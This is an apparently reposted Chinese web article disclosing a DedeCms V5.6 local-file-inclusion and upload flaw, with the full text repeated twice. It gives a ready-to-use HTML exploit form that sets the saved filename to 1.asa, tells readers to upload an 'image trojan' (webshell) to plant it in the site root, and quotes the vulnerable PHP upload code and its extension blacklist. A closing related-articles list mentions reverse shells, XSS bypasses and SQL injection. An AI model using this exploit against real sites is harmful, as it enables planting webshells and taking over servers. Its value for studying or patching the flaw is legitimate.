DedeCms V5.6 本地包含里的上傳漏洞(可是那包含漏洞已經(jīng)公布)
發(fā)布時(shí)間:2011-08-19 10:53:51 作者:佚名
我要評(píng)論

DedeCms V5.6 本地包含里的上傳漏洞(可是那包含漏洞已經(jīng)公布) ,使用dedecms5.6的朋友可以參考下。
DedeCmsV5.6 本地包含
DedeCmsV5.6 本地包含
http://t00ls.net/thread-8608-1-1.html
之前就發(fā)現(xiàn)了這本地包含的利用方法。
<form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch">
<input type="hidden" name="newname" value="1.asa">
<input type="file" name="uploadfile">
<input type="submit" value="搜索" name="QuickSearchBtn">
</form>
上傳一個(gè)圖片木馬(只改后輟名為圖片類(lèi)型就行),即可在網(wǎng)站根目錄生成 1.asa 文件
簡(jiǎn)單分析:
文件:select_soft_post.php
<?php
if(!isset($cfg_basedir))
{
include_once(dirname(__FILE__).'/config.php');
}
//config.php 是用于驗(yàn)證是否管理員。由于本地包含, $cfg_basedir 已經(jīng)設(shè)置了值,應(yīng)該跳過(guò)了驗(yàn)證。
//文件名(前為手工指定, 后者自動(dòng)處理)
if(!empty($newname))
{
$filename = $newname;
if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name);
else $fs = explode('.', $filename);
if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
{
ShowMsg("你指定的文件名被系統(tǒng)禁止!",'javascript:;');
exit();
}
if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1];
}else{
$filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme));
$fs = explode('.', $uploadfile_name);
if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
{
ShowMsg("你上傳了某些可能存在不安全因素的文件,系統(tǒng)拒絕操作!",'javascript:;');
exit();
}
$filename = $filename.'.'.$fs[count($fs)-1];
}
問(wèn)題就出在 $newname 那里,沒(méi)驗(yàn)證上傳類(lèi)型,但驗(yàn)證了非可上傳類(lèi)型
//這里強(qiáng)制限定的某些文件類(lèi)型禁止上傳
$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";
即可以上傳非上面類(lèi)型的文件,有時(shí)也并不雞肋。。
DedeCmsV5.6 本地包含
http://t00ls.net/thread-8608-1-1.html
之前就發(fā)現(xiàn)了這本地包含的利用方法。
復(fù)制代碼
代碼如下:<form action="http://localhost:8090/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch">
<input type="hidden" name="newname" value="1.asa">
<input type="file" name="uploadfile">
<input type="submit" value="搜索" name="QuickSearchBtn">
</form>
上傳一個(gè)圖片木馬(只改后輟名為圖片類(lèi)型就行),即可在網(wǎng)站根目錄生成 1.asa 文件
簡(jiǎn)單分析:
文件:select_soft_post.php
復(fù)制代碼
代碼如下:<?php
if(!isset($cfg_basedir))
{
include_once(dirname(__FILE__).'/config.php');
}
//config.php 是用于驗(yàn)證是否管理員。由于本地包含, $cfg_basedir 已經(jīng)設(shè)置了值,應(yīng)該跳過(guò)了驗(yàn)證。
//文件名(前為手工指定, 后者自動(dòng)處理)
if(!empty($newname))
{
$filename = $newname;
if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name);
else $fs = explode('.', $filename);
if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
{
ShowMsg("你指定的文件名被系統(tǒng)禁止!",'javascript:;');
exit();
}
if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1];
}else{
$filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme));
$fs = explode('.', $uploadfile_name);
if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
{
ShowMsg("你上傳了某些可能存在不安全因素的文件,系統(tǒng)拒絕操作!",'javascript:;');
exit();
}
$filename = $filename.'.'.$fs[count($fs)-1];
}
問(wèn)題就出在 $newname 那里,沒(méi)驗(yàn)證上傳類(lèi)型,但驗(yàn)證了非可上傳類(lèi)型
//這里強(qiáng)制限定的某些文件類(lèi)型禁止上傳
$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";
即可以上傳非上面類(lèi)型的文件,有時(shí)也并不雞肋。。
相關(guān)文章
thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來(lái)介紹一下thinkphp官方修復(fù)的一個(gè)getshell漏洞,框架對(duì)控制器沒(méi)有進(jìn)行足夠的檢測(cè)導(dǎo)致的一處getshell,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實(shí)網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶(hù)端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
SQL注入黑客防線(xiàn)網(wǎng)站實(shí)例分析
這篇文章主要介紹了SQL注入黑客防線(xiàn)網(wǎng)站實(shí)例分析,需要的朋友可以參考下2017-05-19ASP+PHP 標(biāo)準(zhǔn)sql注入語(yǔ)句(完整版)
這里為大家分享一下sql注入的一些語(yǔ)句,很多情況下由于程序員的安全意識(shí)薄弱或基本功不足就容易導(dǎo)致sql注入安全問(wèn)題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19- 對(duì)于目前流行的sql注入,程序員在編寫(xiě)程序時(shí),都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會(huì)自動(dòng)的記錄下你的IP地址,提交的非法參數(shù)和動(dòng)作等,2017-04-29
XSS繞過(guò)技術(shù) XSS插入繞過(guò)一些方式總結(jié)
我們友情進(jìn)行XSS檢查,偶然跳出個(gè)小彈窗,其中我們總結(jié)了一些平時(shí)可能用到的XSS插入方式,方便我們以后進(jìn)行快速檢查,也提供了一定的思路,其中XSS有反射、存儲(chǔ)、DOM這三類(lèi)2016-12-27Python 爬蟲(chóng)使用動(dòng)態(tài)切換ip防止封殺
這篇文章主要介紹了Python 爬蟲(chóng)使用動(dòng)態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08使用爬蟲(chóng)采集網(wǎng)站時(shí),解決被封IP的幾種方法
這篇文章主要介紹了使用爬蟲(chóng)采集網(wǎng)站時(shí),解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08